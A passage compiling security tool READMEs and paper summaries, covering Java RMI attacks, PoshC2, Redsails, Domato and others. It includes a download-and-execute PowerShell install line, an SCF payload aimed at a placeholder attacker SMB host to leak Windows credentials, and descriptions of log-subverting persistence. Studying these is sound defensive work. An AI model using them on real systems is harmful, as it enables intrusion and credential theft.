Java RMI enumeration tool.
Written by Nicky Bloor (@NickstaDB)

Warning: BaRMIe was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

Usage:
  BaRMIe -enum [options] [host] [port]
    Enumerate RMI services on the given endpoint(s).
    Note: if -enum is not specified, this is the default mode.
  BaRMIe -attack [options] [host] [port]
    Enumerate and attack the given target(s).

Options:
  --threads  The number of threads to use for enumeration (default 10).
  --timeout  The timeout for blocking socket operations (default 5,000ms).
  --targets  A file containing targets to scan. The file should contain a
             single host or space-separated host and port pair per line.
             Alternatively, all nmap output formats are supported; BaRMIe
             will parse nmap output for port 1099, 'rmiregistry', or
             'Java RMI' services to target.
             Note: [host] [port] not supported when --targets is used.

Reliability:
  A +/- system is used to indicate attack reliability as follows:
   [+  ]: Indicates an application-specific attack
   [-  ]: Indicates a JRE attack
   [ + ]: Attack insecure methods (such as 'writeFile' without auth)
   [ - ]: Attack Java deserialization (i.e. Object parameters)
   [  +]: Does not require non-default dependencies
   [  -]: Non-default dependencies are required

Enumeration mode (-enum) extracts details of objects that are exposed through an RMI registry service and lists any known attacks that affect the endpoint. Attack mode (-attack) first enumerates the given targets, then provides a menu system for launching known attacks against RMI services. A single target can be specified on the command line. Alternatively, BaRMIe can extract targets from a simple text file or nmap output.

No Vulnerable Targets Identified?
Great!
This is your opportunity to help improve BaRMIe! BaRMIe relies on some knowledge of the classes exposed over RMI, so contributions will go a long way in improving BaRMIe and the security of RMI services. If you have access to JAR files or source code for the target application, then producing an attack is as simple as compiling code against the relevant JAR files. Retrieve the relevant remote object using the LocateRegistry and Registry classes and call the desired methods. Alternatively, look for remote methods that accept arbitrary objects or otherwise non-primitive parameters, as these can be used to deliver deserialization payloads. More documentation on attacking RMI and producing attacks for BaRMIe will be made available in the near future. Alternatively, get in touch and provide as much detail as possible, including BaRMIe -enum output and ideally the relevant JAR files.

Attack Types
BaRMIe is capable of performing three types of attacks against RMI services. A brief description of each follows. Further technical details will be published in the near future at https://nickbloor.co.uk/. In addition to this, I presented the results of my research at 44CON 2017 and the slides can be found here: BaRMIe - Poking Java's Back Door.

1. Attacking Insecure Methods
The first and most straightforward method of attacking insecure RMI services is to simply call insecure remote methods. Often dangerous functionality is exposed over RMI which can be triggered by simply retrieving the remote object reference and calling the dangerous method. The following code is an example of this:

//Get a reference to the remote RMI registry service
Registry reg = LocateRegistry.getRegistry(targetHost, targetPort);

//Get a reference to the target RMI object
Foo bar = (Foo)reg.lookup(objectName);

//Call the remote executeCommand() method
bar.executeCommand(cmd);

2.
Deserialization via Object-type Parameters
Some RMI services do not expose dangerous functionality, or they implement security controls such as authentication and session management. If the RMI service exposes a method that accepts an arbitrary Object as a parameter, then that method can be used as an entry point for deserialization attacks. Some examples of such methods can be seen below:

public void setOption(String name, Object value);
public void addAll(List values);

3. Deserialization via Illegal Method Invocation
Due to the use of serialization, and insecure handling of method parameters on the server, it is possible to use any method with non-primitive parameter types as an entry point for deserialization attacks. BaRMIe achieves this by using TCP proxies to modify method parameters at the network level, essentially triggering illegal method invocations. Some examples of vulnerable methods can be seen below:

public void setName(String name);
public Long add(Integer i1, Integer i2);
public void sum(int[] values);

The parameters to each of these methods can be replaced with a deserialization payload as the method invocation passes through a proxy. This attack is possible because Java does not attempt to verify that remote method parameters received over the network are compatible with the actual parameter types before deserializing them.

Sursa: https://github.com/NickstaDB/BaRMIe
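The entry points above are Java-specific, but the underlying risk (deserializing attacker-controlled bytes that can describe arbitrary object graphs) is common to many serialization frameworks. As a hedged, language-neutral illustration rather than BaRMIe code, Python's pickle shows how code can execute during deserialization itself, before the receiving method ever runs:

```python
import os
import pickle

class Payload:
    # __reduce__ tells pickle how to rebuild the object: here it says
    # "call os.getcwd()", a harmless stand-in for e.g. os.system(cmd).
    def __reduce__(self):
        return (os.getcwd, ())

blob = pickle.dumps(Payload())   # what an attacker would send on the wire
result = pickle.loads(blob)      # os.getcwd() runs during deserialization
print(result == os.getcwd())     # → True
```

Java deserialization gadget chains (e.g. those generated by ysoserial) exploit the same principle: the payload executes while the object stream is being reconstructed, which is why any remote method with a non-primitive parameter is a viable entry point.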
PoshC2

PoshC2 is a proxy-aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. The tools and modules were developed off the back of our successful PowerShell sessions and payload types for the Metasploit Framework. PowerShell was chosen as the base language as it provides all of the functionality and rich features required without needing to introduce multiple languages to the framework.

Find us on #Slack - poshc2.slack.com

Requires only PowerShell v2 on both server and client (C2 Server and Implant Handler).

Quick Install
powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/C2-Installer.ps1')"

Team Server
Create one PoshC2 team server and allow multiple red teamers to connect using the C2 Viewer and Implant Handler.

Wiki
For more info see the GitHub Wiki.

Sursa: https://github.com/nettitude/PoshC2
Abstract—With the rise of attacks using PowerShell in recent months, there has not been a comprehensive solution for monitoring or prevention. Microsoft recently released the AMSI solution for PowerShell v5; however, this can also be bypassed. This paper focuses on repurposing various stealthy runtime .NET hijacking techniques, originally implemented for PowerShell attacks, for defensive monitoring of PowerShell. It begins with a brief introduction to .NET and PowerShell, followed by a deeper explanation of various attacker techniques, explained from the perspective of the defender, including assembly modification, class and method injection, compiler profiling, and C-based function hooking. Of the four attacker techniques that are repurposed for defensive real-time monitoring of PowerShell execution, intermediate language binary modification, JIT hooking, and machine code manipulation provide the best results for stealthy run-time interfaces for PowerShell scripting analysis.

Download: https://arxiv.org/pdf/1709.07508.pdf
Redsails

About
A post-exploitation tool capable of:
maintaining persistence on a compromised machine
subverting many common host event logs (both network and account logon)
generating false logs / network traffic

Based on PyDivert (https://github.com/ffalcinelli/pydivert), a Python binding for WinDivert, a Windows driver that allows user-mode applications to capture/modify/drop network packets sent to/from the Windows network stack. Built for Windows operating systems newer than Vista and Windows 2008 (including Windows 7, Windows 8 and Windows 10).

Dependencies
Redsails depends on PyDivert and WinDivert. You can resolve those dependencies by running:

pip install pydivert
pip install pbkdf2

PyCrypto is also needed:

easy_install pycrypto

PyCrypto may have a dependency on Microsoft Visual C++ Compiler for Python 2.7 (http://aka.ms/vcpython27).

Usage
Server (victim host you are attacking):

redSails.py

Or, if the victim does not have Python installed, you can run the provided exe (or compile your own! instructions below):

redSails.exe

Client (attacker):

redSailsClient.py <ip> <port>

Creating an executable
To compile an exe (for deployment) in lieu of the Python script, you will need PyInstaller:

pip install pyinstaller

Then you can create the exe:

pyinstaller-script.py -F --clean redSails.spec

License
Copyright (C) 2017 Robert J. McDown, Joshua Theimer

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.
Sursa: https://github.com/BeetleChunks/redsails
Abstract—Developing an approach to test cryptographic hash function implementations can be particularly difficult, and bugs can remain unnoticed for a very long time. We revisit the NIST SHA-3 hash function competition, and apply a new testing strategy to all available reference implementations. Motivated by the cryptographic properties that a hash function should satisfy, we develop four types of tests. The Bit-Contribution Test checks if changes in the message affect the hash value, and the Bit-Exclusion Test checks that changes beyond the last bit of the message leave the hash value unchanged. We develop the Metamorphic Update Test to verify that messages are processed correctly in chunks, and then use combinatorial testing methods to reduce the test set size by several orders of magnitude while retaining the same fault detection capability. Our tests detect bugs in 41 of the 86 reference implementations submitted to the SHA-3 competition, including the rediscovery of a bug in all submitted implementations of the SHA-3 finalist BLAKE. This bug remained undiscovered for seven years, and is particularly serious because it provides a simple strategy to modify the message without changing the hash value that is returned by the implementation. We will explain how to detect this type of bug, using a simple and fully-automated testing approach. Download: https://eprint.iacr.org/2017/891.pdf
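The first and third test types described in the abstract are easy to approximate for any byte-oriented hash API. The sketch below is not the paper's framework; it uses Python's hashlib and works at byte rather than bit granularity for the message length, but it implements the Bit-Contribution Test and the Metamorphic Update Test ideas directly:

```python
import hashlib

def bit_contribution_test(msg):
    """Flipping any single bit of the message must change the digest."""
    baseline = hashlib.sha3_256(msg).digest()
    for i in range(len(msg) * 8):
        flipped = bytearray(msg)
        flipped[i // 8] ^= 1 << (i % 8)   # flip bit i
        if hashlib.sha3_256(bytes(flipped)).digest() == baseline:
            return False  # a bit that does not contribute -> implementation bug
    return True

def metamorphic_update_test(chunks):
    """Hashing chunk-by-chunk must equal hashing the concatenation."""
    h = hashlib.sha3_256()
    for chunk in chunks:
        h.update(chunk)
    return h.digest() == hashlib.sha3_256(b"".join(chunks)).digest()

print(bit_contribution_test(b"hello world"))           # → True
print(metamorphic_update_test([b"he", b"llo", b""]))   # → True
```

A buggy implementation of the kind described in the paper, such as the BLAKE bug that lets the message be modified without changing the returned hash, would make the first test return False for some bit position.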
Domato
A DOM fuzzer

Written and maintained by Ivan Fratric, ifratric@google.com
Copyright 2017 Google Inc. All Rights Reserved.

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Usage
To generate a single .html sample run:

python generator.py <output file>

To generate multiple samples with a single call run:

python generator.py --output_dir <output directory> --no_of_files <number of output files>

The generated samples will be placed in the specified directory and will be named fuzz-<number>.html, e.g. fuzz-1.html, fuzz-2.html etc. Generating multiple samples is faster because the input grammar files need to be loaded and parsed only once.

Code organization
generator.py contains the main script. It uses grammar.py as a library and contains additional helper code for DOM fuzzing.
grammar.py contains the generation engine that is mostly application-agnostic and can thus be used in other (i.e. non-DOM) generation-based fuzzers. As it can be used as a library, its usage is described in a separate section below.
The .txt files contain grammar definitions. There are 3 main files, html.txt, css.txt and js.txt, which contain the HTML, CSS and JavaScript grammars, respectively. These root grammar files may include content from other files.
Using the generation engine and writing grammars
To use the generation engine with a custom grammar, you can use the following Python code:

from grammar import Grammar

my_grammar = Grammar()
my_grammar.ParseFromFile('input_file.txt')
result_string = my_grammar.GenerateSymbol('symbol_name')

The following sections describe the syntax of the grammar files.

Basic syntax
Domato is based on an engine that, given a context-free grammar in a simple format specified below, generates samples from that grammar. A grammar is described as a set of rules in the following basic format:

<symbol> = a mix of constants and <other_symbol>s

Each grammar rule contains a left side and a right side separated by the equals character. The left side contains a symbol, while the right side contains the details on how that symbol may be expanded. When expanding a symbol, all symbols on the right-hand side are expanded recursively while everything that is not a symbol is simply copied to the output. Note that a single rule can't span multiple lines of the input file.

Consider the following simplified example of a part of the CSS grammar:

<cssrule> = <selector> { <declaration> }
<selector> = a
<selector> = b
<declaration> = width:100%

If we instruct the grammar engine to parse that grammar and generate 'cssrule', we may end up with either

a { width:100% }

or

b { width:100% }

Note that there are two rules for the 'selector' symbol. In such cases, when the generator is asked to generate a 'selector', it will select the rule to use at random. It is also possible to specify the probability of a rule using the 'p' attribute, for example:

<selector p=0.9> = a
<selector p=0.1> = b

In this case, the string 'a' would be output more often than 'b'.

There are other attributes that can be applied to symbols in addition to the probability. Those are listed in a separate section.
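The probability-weighted rule selection described above is the heart of any grammar-based generator. As a toy illustration only (Domato's real engine in grammar.py is far more featureful), the weighted-choice expansion over the simplified CSS grammar can be sketched like this:

```python
import random

# The simplified CSS grammar from above, with the p= probabilities
# expressed as weights.
RULES = {
    "cssrule": [("<selector> { <declaration> }", 1.0)],
    "selector": [("a", 0.9), ("b", 0.1)],
    "declaration": [("width:100%", 1.0)],
}

def generate(symbol):
    """Pick a production at random, expanding nested <symbol>s recursively."""
    productions = RULES[symbol]
    rhs = random.choices(
        [p for p, _ in productions],
        weights=[w for _, w in productions],
    )[0]
    out, i = "", 0
    while i < len(rhs):
        if rhs[i] == "<":                 # expand a nested symbol
            j = rhs.index(">", i)
            out += generate(rhs[i + 1 : j])
            i = j + 1
        else:                             # copy constants verbatim
            out += rhs[i]
            i += 1
    return out

print(generate("cssrule"))  # e.g. "a { width:100% }" (or, rarely, with "b")
```

With the 0.9/0.1 weights, roughly nine out of ten generated rules will use selector 'a', matching the behaviour the README describes.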
Consider another example for generating HTML samples:

<html> = <lt>html<gt><head><body><lt>/html<gt>
<head> = <lt>head<gt>...<lt>/head<gt>
<body> = <lt>body<gt>...<lt>/body<gt>

Note that since the '<' and '>' characters have a special meaning in the grammar syntax, we are using <lt> and <gt> instead. These symbols are built in and don't need to be defined by the user. A list of all built-in symbols is provided in a separate section.

Generating programming language code
To generate programming language code, a similar syntax can be used, but there are a couple of differences. Each line of the programming language grammar is going to correspond to a line of the output. Because of that, the grammar syntax is more free-form, to allow expressing constructs in various programming languages. Secondly, when a line is generated, one or more variables may be created, and those variables may be reused when generating other lines.

Again, let's take a look at a simplified example:

!varformat fuzzvar%05d
!lineguard try { <line> } catch(e) {}

!begin lines
<new element> = document.getElementById("<string min=97 max=122>");
<element>.doSomething();
!end lines

If we instruct the engine to generate 5 lines, we may end up with something like:

try { var00001 = document.getElementById("hw"); } catch(e) {}
try { var00001.doSomething(); } catch(e) {}
try { var00002 = document.getElementById("feezcqbndf"); } catch(e) {}
try { var00002.doSomething(); } catch(e) {}
try { var00001.doSomething(); } catch(e) {}

Note that programming language lines are enclosed in '!begin lines' and '!end lines' statements. This gives the grammar parser the information that the lines in between are programming language lines and are thus parsed differently. We used <new element> instead of <element>. This instructs the generator to create a new variable of type 'element' instead of generating the 'element' symbol.
<string> is one of the built-in symbols, so there is no need to define it.
[optional] You can use the !varformat statement to define the format of the variables you want to use.
[optional] You can use the !lineguard statement to define additional code that gets inserted around every line in order to catch exceptions or perform other tasks. This way you don't need to write it for every line separately.

In addition to '!begin lines' and '!end lines' you can also use '!begin helperlines' and '!end helperlines' to define lines of code that will only ever be used if required when generating other lines (for example, helper lines might generate variables needed by the 'main' code, but you don't ever want those helper lines to end up in the output when they are not needed).

Comments
Everything after the first '#' character on a line is considered a comment, for example:

#This is a comment

Preventing infinite recursions
The grammar syntax has a way of telling the fuzzer which rules are nonrecursive and thus safe to use even if the maximum level of recursion has been reached. This is done with the 'nonrecursive' attribute. An example is given below:

!max_recursion 10
<test root=true> = <foobar>
<foobar> = foo<foobar>
<foobar nonrecursive> = bar

Firstly, an optional '!max_recursion' statement defines the maximum recursion depth level (50 by default). Notice that the second production rule for the 'foobar' symbol is marked as nonrecursive. If the maximum recursion level is ever reached, the generator will force using the nonrecursive rule for the 'foobar' symbol, thus preventing infinite recursion.

Including and importing other grammar files
In Domato, including and importing grammars are two different concepts. Including is simpler: you can use

!include other.txt

to include rules from other.txt into the currently parsed grammar.
Importing works a bit differently:

!import other.txt

tells the parser to create a new Grammar() object that can then be referenced from the current grammar by using the special <import> symbol, for example like this:

<cssrule> = <import from=css.txt symbol=rule>

You can think about importing and including in terms of namespaces: !include will put the included grammar into a single namespace, while !import will create a new namespace which can then be accessed using the <import> symbol and the namespace specified via the 'from' attribute.

Including Python code
Sometimes you might want to call custom Python code from your grammar. For example, let's say you want to use the engine to generate an HTTP response and you want the body length to match the 'Size' header. Since this is something not possible with normal grammar rules, you can include custom Python code to accomplish it like this:

!begin function savesize
context['size'] = ret_val
!end function

!begin function createbody
n = int(context['size'])
ret_val = 'a' * n
!end function

<foo root> = <header><cr><lf><body>
<header> = Size: <int min=1 max=20 beforeoutput=savesize>
<body> = <call function=createbody>

The Python functions are defined between '!begin function <function_name>' and '!end function' commands. The functions can be called in two ways: using the 'beforeoutput' attribute and using the <call> symbol. By specifying the 'beforeoutput' attribute on some symbol, the corresponding function will be called when this symbol is expanded, just before the result of the expansion is output to the sample. The expansion result will be passed to the function in the ret_val variable. The function is then free to modify ret_val, store it for later use, or perform any other operations. When using the special <call> symbol, the function (specified in the 'function' attribute) will be called when the symbol is encountered during generation.
Any value stored by the function in ret_val will be considered the result of the expansion (ret_val gets included in the sample).

Your Python code has access to the following variables:
context - a dictionary that is passed through the whole sample generation. You can use it to store values (such as storing the size in the example above) and retrieve them in rules that fire subsequently.
attributes - a dictionary corresponding to the attributes of the symbol currently being processed. You can use it to pass parameters to your functions. For example, if the symbol that calls your function carries an attribute foo=bar, attributes['foo'] will be set to 'bar'.
ret_val - the value that will be output as the result of the function call. It is initialized to an empty value when using the <call> symbol to call a function; otherwise it will be initialized to the value generated by the symbol.

Built-in symbols
The following symbols have a special meaning and should not be redefined by users:
<lt> - '<' character
<gt> - '>' character
<hash> - '#' character
<cr> - CR character
<lf> - LF character
<space> - space character
<tab> - tab character
<ex> - '!' character
<char> - can be used to generate an arbitrary ASCII character using the 'code' attribute. For example, <char code=97> corresponds to 'a'. Generates a random character if not specified. Supports 'min' and 'max' attributes.
<hex> - generates a random hex digit
<int>, <int8>, <uint8>, <int16>, <uint16>, <int32>, <uint32>, <int64>, <uint64> - can be used to generate random integers. Support 'min' and 'max' attributes that can be used to limit the range of integers that will be generated. Support the 'b' and 'be' attributes, which make the output binary in little/big-endian format instead of text output.
<float>, <double> - generates a random floating-point number. Supports 'min' and 'max' attributes (0 and 1 if not specified). Supports the 'b' attribute, which makes the output binary.
<string> - generates a random string.
Supports 'min' and 'max' attributes, which control the minimum and maximum charcode generated, as well as 'minlength' and 'maxlength' attributes, which control the length of the string.
<lines> - outputs the given number (via the 'count' attribute) of lines of code. See the section on generating programming language code for an example.
<import> - imports a symbol from another grammar; see the section on including external grammars for details.
<call> - calls a user-defined function corresponding to the 'function' attribute. See the section on including Python code in the grammar for more info.

Symbol attributes
The following attributes are supported:
root - marks a symbol as the root symbol of the grammar. The only supported value is 'true'. When GenerateSymbol() is called, if no argument is specified, the root symbol will be generated.
nonrecursive - gives the generator a hint that this rule doesn't contain recursion loops and is used to prevent infinite recursions. The only supported value is 'true'.
new - used when generating programming languages to denote that a new variable is created here rather than expanding the symbol as usual. The only supported value is 'true'.
from, symbol - used when importing symbols from other grammars; see the 'Including and importing other grammar files' section.
count - used in the <lines> symbol to specify the number of lines to be created.
id - used to mark that several symbols should share the same value. For example, in the rule 'doSomething(<int id=1>, <int id=1>)' both ints would end up having the same value. Only the first instance is actually expanded; the second is just copied from the first.
min, max - used in generation of numeric types to specify the minimum and maximum value. Also used to limit the set of characters generated in strings.
b, be - used in numeric types to specify binary little-endian ('b') or big-endian ('be') output.
code - used in the <char> symbol to specify the exact character to output by its code.
minlength, maxlength - used when generating strings to specify the minimum and maximum length.
up - used in the <hex> symbol to specify uppercase output (lowercase is the default).
function - used in the <call> symbol; see the 'Including Python code' section for more info.
beforeoutput - used to call user-specified functions; see the 'Including Python code' section for more info.

Bug Showcase
Some of the bugs that have been found with Domato:

Apple Safari: CVE-2017-2369, CVE-2017-2373, CVE-2017-2362, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2466, CVE-2017-2471, CVE-2017-2476, CVE-2017-7039, CVE-2017-7040, CVE-2017-7041, CVE-2017-7042, CVE-2017-7043, CVE-2017-7046, CVE-2017-7048, CVE-2017-7049
Google Chrome: Issues 666246 and 671328
Microsoft Internet Explorer 11: CVE-2017-0037, CVE-2017-0059, CVE-2017-0202, CVE-2017-8594
Microsoft Edge: CVE-2017-0037, CVE-2017-8496, CVE-2017-8652, CVE-2017-8644
Mozilla Firefox: CVE-2017-5404, CVE-2017-5447, CVE-2017-5465

Disclaimer
This is not an official Google product.

Sursa: https://github.com/google/domato
INTRO
Global Proxy App for Android System

ProxyDroid is distributed under GPLv3 along with many other open source software; here is a list of them:
cntlm - authentication proxy: http://cntlm.sourceforge.net/
redsocks - transparent socks redirector: http://darkk.net.ru/redsocks/
netfilter/iptables - NAT module: http://www.netfilter.org/
transproxy - transparent proxy for HTTP: http://transproxy.sourceforge.net/
stunnel - multiplatform SSL tunneling proxy: http://www.stunnel.org/

TRAVIS CI STATUS
Nightly Builds

PREREQUISITES
JDK 1.6+
Maven 3.0.5
Android SDK r17+
Android NDK r8+

Local Maven Dependencies
Use Maven Android SDK Deployer to install all Android-related dependencies:

git clone https://github.com/mosabua/maven-android-sdk-deployer.git
pushd maven-android-sdk-deployer
export ANDROID_HOME=/path/to/android/sdk
mvn install -P 4.1
popd

BUILD
Invoke the build like this:

mvn clean install

Sursa: https://github.com/madeye/proxydroid
Subgraph OS: Adversary resistant computing platform

Subgraph OS is a desktop computing and communications platform that is designed to be resistant to network-borne exploit and malware attacks. It is also meant to be familiar and easy to use. Even in alpha, Subgraph OS looks and feels like a modern desktop operating system. Subgraph OS includes strong system-wide attack mitigations that protect all applications as well as the core operating system, and key applications are run in sandbox environments to reduce the impact of any successful attacks against applications. Subgraph OS was designed to reduce the risks in endpoint systems so that individuals and organizations around the world can communicate, share, and collaborate without fear of surveillance or interference by sophisticated adversaries through network-borne attacks. Subgraph OS is designed to be difficult to attack. This is accomplished through system hardening and proactive, ongoing research on defensible system design.

Hardened kernel built with grsecurity, PaX, and RAP
Subgraph OS includes a kernel hardened with the well-respected grsecurity/PaX patchset for system-wide exploit and privilege escalation mitigation. In addition to making the kernel more resistant to attacks, grsecurity and PaX security features offer strong protection to all processes running without modification (i.e. without recompiling/relinking). The Subgraph OS kernel is also built with the recently released RAP security enhancements (demo from the test patch), designed to prevent code-reuse (i.e. ROP) attacks in the kernel. This is an important mitigation against contemporary exploitation techniques and greatly increases the resistance of the kernel to modern exploits that can be used to escalate privileges once an application on the endpoint is breached. grsecurity, PaX, and RAP are essential defenses implemented in Subgraph OS.
The Subgraph OS kernel (4.9) is also built with as few features as possible while still producing a widely usable desktop operating system. This is done to proactively reduce kernel attack surface.

Sandboxed applications
Subgraph OS runs exposed or vulnerable applications in sandbox environments. This sandbox framework, known as Oz and unique to Subgraph OS, is designed to isolate applications from each other and the rest of the system. Access to system resources is only granted to applications that need them. For example, the PDF viewer and the image viewer do not have access to any network interface in the sandbox they're configured to run in. The technologies underlying Oz include Linux namespaces, restricted filesystem environments, desktop isolation, and seccomp-bpf to reduce kernel attack surface through system call whitelists. Subgraph regularly instruments applications and libraries to limit the exposed kernel API to what is necessary for each sandboxed application to function. Many applications only need about one-third to one-half of the available system calls to function, and the Subgraph Oz sandbox framework ensures that the unnecessary system calls cannot be invoked (Oz can and often does restrict system calls to specific known parameters, to further narrow kernel attack surface through system calls such as ioctl(2)). Subgraph OS will soon be using gosecco, a new library for seccomp-bpf that lets policies be expressed in a format that is more efficient, cross-platform, and understandable to humans.

Sandboxed applications include:
Web browser
Email client with built-in support for encryption
CoyIM instant messenger
LibreOffice productivity suite
PDF viewer
Image viewer
Video player
Hexchat

Memory Safety
Most custom code written for Subgraph OS is written in Golang, which is a memory-safe language.
Golang libraries are also often implemented in pure Golang, in contrast to other popular languages such as Python. While the Python runtime may be memory safe, the C code wrapped by so many of the commonly used libraries exposes tools written in Python to the same old memory corruption vulnerabilities.

Application firewall

Subgraph also includes an application firewall that will detect and alert the user to unexpected outbound connections by applications. The Subgraph application firewall is fairly unique among Linux-based operating systems and is an area of ongoing development.

Other security features

Subgraph OS is constantly improving and hardening the default security state of the operating system. This includes making configuration enhancements and adding entirely new mitigations. Additional security features in Subgraph OS include:
- AppArmor profiles covering many system utilities and applications
- Security event monitor and desktop notifications (coming soon)
- Roflcoptor tor control port filter service
- Port to Gosecco, a new seccomp-bpf golang library

Hardened: Subgraph OS is based on a foundation designed to be resistant to attacks against operating systems and the applications they run.

Anonymized: Subgraph OS includes built-in Tor integration, and a default policy that sensitive applications only communicate over the Tor network.

Secure communication: Subgraph OS ships with a new, more secure IM client, and an e-mail client configured by default for PGP and Tor support.

Alpha release availability

Try the Subgraph OS Alpha today. You can install it on a computer, run it as a live disk, or use it in a VM.

Sursa: https://subgraph.com/index.en.html
MacOS host monitoring - the open source way
Michael George
Derbycon 2017

In this talk on macOS host monitoring the open source way, I will walk through an example piece of malware (HandBrake/Proton) and show how you can use open source detection tooling to do detection and light forensics. Since I will be talking about the HandBrake malware, I will also share some of the TTPs the malware used, in case you want to hunt for this activity in your fleet.

Dropbox - Security Engineer. I work on the Incident Response team at Dropbox. I primarily work on host-based detection systems.

Sursa: http://www.irongeek.com/i.php?page=videos/derbycon7/s30-macos-host-monitoring-the-open-source-way-michael-george
Stealing Windows Credentials Using Google Chrome

Author/Researcher: Bosko Stankovic (bosko defensecode.com)
http://www.defensecode.com

Attacks that leak authentication credentials using the SMB file sharing protocol on Windows are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare pieces of research involving attacks over the internet was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference [1] [2] in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This paper describes an attack which can lead to Windows credential theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it.

Download: https://www.exploit-db.com/docs/42015.pdf
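The attack in the paper abuses Windows Explorer's handling of SCF (Shell Command File) files: Chrome downloads a .scf file without prompting, and as soon as the download directory is opened, Explorer resolves the file's icon path, authenticating to the attacker's SMB server with the victim's credentials. A minimal SCF payload (the IP and share name below are placeholders) looks like this:

```ini
[Shell]
Command=2
IconFile=\\170.170.170.170\share\icon.ico
```

A common mitigation for this class of credential leak is blocking outbound SMB (TCP ports 139 and 445) at the network perimeter.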
Triton is a dynamic binary analysis (DBA) framework. It provides internal components like a Dynamic Symbolic Execution (DSE) engine, a Taint Engine, AST representations of the x86 and x86-64 instruction set semantics, SMT simplification passes, an SMT solver interface and, last but not least, Python bindings. Based on these components, you are able to build program analysis tools, automate reverse engineering and perform software verification. As Triton is still a young project, please, don't blame us if it is not yet reliable. Open issues or pull requests are always better than troll =). A full documentation is available on our doxygen page.

Quick start
- Description
- Installation
- Examples
- Presentations and Publications

Internal documentation
- Dynamic Symbolic Execution
- Symbolic Execution Optimizations
- AST Representations of Semantics
- SMT Semantics Supported
- SMT Solver Interface
- SMT Simplification Passes
- Spread Taint
- Tracer Independent
- Python Bindings

News

A blog is available and you can follow us on twitter @qb_triton or via our RSS feed.

Support

IRC: #qb_triton@freenode
Mail: triton at quarkslab com

Authors
- Jonathan Salwan - Lead dev, Quarkslab
- Pierrick Brunet - Core dev, Quarkslab
- Florent Saudel - Core dev, Bordeaux University
- Romain Thomas - Core dev, Quarkslab

Cite Triton

@inproceedings{SSTIC2015-Saudel-Salwan,
  author    = {Florent Saudel and Jonathan Salwan},
  title     = {Triton: A Dynamic Symbolic Execution Framework},
  booktitle = {Symposium sur la s{\'{e}}curit{\'{e}} des technologies de l'information
               et des communications, SSTIC, France, Rennes, June 3-5 2015},
  publisher = {SSTIC},
  pages     = {31--54},
  year      = {2015},
}

Sursa: https://github.com/JonathanSalwan/Triton
Introduction

Build functional security testing into your software development and release cycles! WebBreaker provides the capabilities to automate and centrally manage Dynamic Application Security Testing (DAST) as part of your DevOps pipeline.

WebBreaker truly enables all members of the Software Security Development Life-Cycle (SDLC), with access to security testing, greater test coverage, and increased visibility by providing Dynamic Application Security Test Orchestration (DASTO). Current support is limited to the world's most popular commercial DAST product, WebInspect.

System Architecture

Supported Features
- Command-line (CLI) scan administration of WebInspect with Fortify SSC products.
- Jenkins Environmental Variable & String Parameter support (i.e. $BUILD_TAG)
- Docker container v17.x support
- Custom email alerting or notifications for scan launch and completion.
- Extensible event logging for scan administration and results.
- WebInspect REST API support for v9.30 and later.
- Fortify Software Security Center (SSC) REST API support for v16.10 and later.
- WebInspect scan cluster support between two (2) or greater WebInspect servers/sensors.
- Capabilities for extensible scan telemetry with ELK and Splunk.
- GIT support for centrally managing WebInspect scan configurations.
- Replaces most functionality of Fortify's fortifyclient
- Python compatibility with versions 2.x or 3.x
- Provides AES 128-bit key management for all secrets from the Fernet encryption Python library.
Quick Local Installation and Configurations

Installing WebBreaker from source:

git clone https://github.com/target/webbreaker
pip install -r requirements.txt
python setup.py install

Configuring WebBreaker:
- Point WebBreaker to your WebInspect API server(s) by editing: webbreaker/etc/webinspect.ini
- Point WebBreaker to your Fortify SSC URL by editing: webbreaker/etc/fortify.ini
- SMTP settings on email notifications and a message template can be edited in webbreaker/etc/email.ini
- Mutually exclusive remote GIT repos created by users are encouraged to persist WebInspect settings, policies, and webmacros. Simply add the GIT URL to webinspect.ini and their respective directories.

NOTES:
- Required: As with any Python application that contains library dependencies, pip is required for installation.
- Optional: Include your Python site-packages, if they are not already in your $PATH, with export PATH=$PATH:$PYTHONPATH.

Usage

WebBreaker is a command-line interface (CLI) client. See our complete WebBreaker Documentation for further configuration, usage, and installation. The CLI supports upper-level and lower-level commands with respective options to enable interaction with Dynamic Application Security Test (DAST) products. Currently, the two products supported are WebInspect and Fortify (more to come in the future!!) Below is a cheatsheet of supported commands to get you started.
List all WebInspect scans:
webbreaker webinspect list --server webinspect-1.example.com:8083

Query WebInspect scans:
webbreaker webinspect list --server webinspect-1.example.com:8083 --scan_name important_site

List with http:
webbreaker webinspect list --server webinspect-1.example.com:8083 --protocol http

Download WebInspect scan from server or sensor:
webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth

Download WebInspect scan as XML:
webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth -x xml

Download WebInspect scan with http (no SSL):
webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth --protocol http

Basic WebInspect scan:
webbreaker webinspect scan --settings important_site_auth

Advanced WebInspect scan with scan overrides:
webbreaker webinspect scan --settings important_site_auth --allowed_hosts example.com --allowed_hosts m.example.com

Scan with local WebInspect settings:
